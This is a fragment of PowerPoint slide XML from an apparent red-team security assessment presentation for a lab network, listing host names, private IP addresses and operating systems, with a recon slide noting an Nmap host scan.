                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gateway:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Red vs Blue</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ELK</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF13D88-EE7A-4388-A10F-E88C5D8C742A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="163840" y="755075"/>
            <a:ext cx="6523335" cy="4109364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA4991B4-99EC-4505-960B-2A9F743FAAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:t>
            </a:fld>
            <a:endParaRPr sz="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dirty="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4000" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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sz="2000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1693348547"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3606580"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{B9850CC8-44EC-4B3D-A968-7F47EAFDB489}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2869988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2694412">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0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hostname</a:t>
                      </a:r>
                      <a:endParaRPr b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>IP Address</a:t>
                      </a:r>
                      <a:endParaRPr b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
